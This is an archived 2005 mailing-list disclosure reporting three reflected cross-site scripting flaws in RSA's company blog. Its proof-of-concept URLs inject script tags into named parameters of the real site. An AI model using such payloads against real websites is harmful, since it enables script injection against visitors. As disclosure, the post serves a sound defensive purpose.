lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050814220217.BB18FFEB5@rgsc.cl> Date: Sun Aug 14 23:01:25 2005 From: rodrigo at rgsc.cl (Rodrigo Gutierrez) Subject: RSA XSS Vulnerabilities RSA XSS Vulnerabilities Author: Rodrigo Gutierrez <rodrigo@...c.cl> Affected: RSA "Speaking of Security" Blog Status: Notified Hereby Vendor url: http://www.rsasecurity.com Background. RSA secures more than 15 million user identities, safeguards trillions of business transactions annually and manages the confidentiality of data in tens of thousands of applications worldwide. 3 cross site scripting vulnerabilities has been discovered in their Blog "Speaking of Security" ;) . Impact An attacker could gather data from the blog's users by fooling them, to access the modified vulnerable application. Proof of Concept http://www.rsasecurity.com/blog/index.asp?author=%22%3E%3Cscript%3Ealert('XS S');%3C/script%3E http://www.rsasecurity.com/blog/index.asp?keyword=%22%3E%3Cscript%3Ealert('X SS');%3C/script%3E http://www.rsasecurity.com/blog/bio.asp?author=%22%3E%3Cscript%3Ealert('XSS' );%3C/script%3E Just for the picture ;) http://www.rsasecurity.com/blog/index.asp?author=%52%6f%64%72%69%67%6f%20%47 %75%74%69%65%72%72%65%7a http://www.rsasecurity.com/blog/index.asp?keyword=%52%6f%64%72%69%67%6f%20%4 7%75%74%69%65%72%72%65%7a Speaking of Security RSA should spend some of those $307.5 million they earned in 2004 to audit their web applications.